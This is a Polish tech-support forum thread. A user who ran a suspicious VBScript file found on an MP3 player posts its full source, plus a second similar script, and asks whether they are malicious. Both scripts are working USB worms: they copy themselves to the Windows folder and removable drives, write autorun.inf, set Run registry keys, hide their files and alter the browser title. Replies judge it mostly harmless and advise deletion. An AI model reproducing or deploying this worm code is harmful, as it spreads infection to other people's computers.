Skocz do zawartości

Dziwny skrypt vbs w mp3-ce(odtwarzaczu)


Bassmaster

Rekomendowane odpowiedzi

Witam, znalazłem w mp3 plik m32.dll.vbs wydało mi się dziwnie bo w pliku skryptowym, uruchomilem, wlaczył mi się explorator, co dziwne, w IE jest dodany na górze napis "Hacked by godzilla" daje poniżej kod źródłowy skryptu abyscie mogli orzec, czy skrypt jest szkodliwy, dziękuje.

 

'My name is Slow but sure V0.05

on error resume next

dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd

atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"

set fs = createobject("Scripting.FileSystemObject")

set mf = fs.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text=mf.openastextstream(1,-2)

do while not text.atendofstream

mysource=mysource&text.readline

mysource=mysource & vbcrlf

loop

do

Set winpath = fs.getspecialfolder(0)

set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")

tf.attributes = 32

set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)

tf.write mysource

tf.close

set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")

tf.attributes = 39

for each flashdrive in fs.drives

If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then

set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")

tf.attributes =32

set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)

tf.write mysource

tf.close

set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")

tf.attributes =39

set tf =fs.getfile(flashdrive.path &"\autorun.inf")

tf.attributes = 32

set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)

tf.write atr

tf.close

set tf =fs.getfile(flashdrive.path &"\autorun.inf")

tf.attributes=39

end if

next

set rg = createobject("WScript.Shell")

rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla"

rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"

if check <> 1 then

Wscript.sleep 200000

end if

loop while check<>1

set sd = createobject("Wscript.shell")

sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

 

Dodam jeszcze drugi kod z 2-giego pliku:

 

'kuciapka tu byl

on error resume next

dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado

katrib="[autorun]"&vbcrlf&"shellexecute=wscript.exe pagefile.sys.vbs"

set kfs=createobject("Scripting.FileSystemObject")

set kmf=kfs.getfile(Wscript.ScriptFullname)

dim text,size

size=kmf.size

check=kmf.drive.drivetype

set text=kmf.openastextstream(1,-2)

do while not text.atendofstream

ksource=ksource&text.readline

ksource=ksource&vbcrlf

loop

do

Set winpath=kfs.getspecialfolder(0)

set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")

kuc.attributes=32

set kuc=kfs.createtextfile(winpath&"\pagefile.sys.vbs",2,true)

kuc.write ksource

kuc.close

set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")

kuc.attributes=39

for each kflash in kfs.drives

If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> "A:" then

set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")

kuc.attributes=32

set kuc=kfs.createtextfile(kflash.path &"\pagefile.sys.vbs",2,true)

kuc.write ksource

kuc.close

set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")

kuc.attributes=39

set kuc=kfs.getfile(kflash.path&"\autorun.inf")

kuc.attributes=32

set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true)

kuc.write katrib

kuc.close

set kuc=kfs.getfile(kflash.path &"\autorun.inf")

kuc.attributes=39

end if

next

set rgpath=createobject("WScript.Shell")

rgpath.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs"

rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"

if check <> 1 then

Wscript.sleep 200000

end if

loop while check<>1

set sado=createobject("Wscript.shell")

sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Odnośnik do komentarza
Udostępnij na innych stronach

Dodało wpis do autoruna i dlatego zmieniło wszystkie belki eksplorera. Tam za bardzo szkodliwy nie jest, nie widzę wpisów grzebiących w systemie tylko zmienia belkę. Usuń to i więcej nie otwieraj dziwnych plików, a w szczególności jak pojawi się kosz 'RECYCLER.EXE', ravmone 'RavMonE.exe', czy ctfmon 'CTFMON.exe', to są trojany.

Odnośnik do komentarza
Udostępnij na innych stronach

u nas w szkolnej sali komputerowej na każdym komputerze było HACKED BY GODZILLA na pasku przeglądarki xD

 

Nom u mnie w gimnazjum w sali inf. na jednym kompie też tak jest xD

 

Dobrze, przywróce system i następnym razem nie będe otwierać takich plików

Odnośnik do komentarza
Udostępnij na innych stronach

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...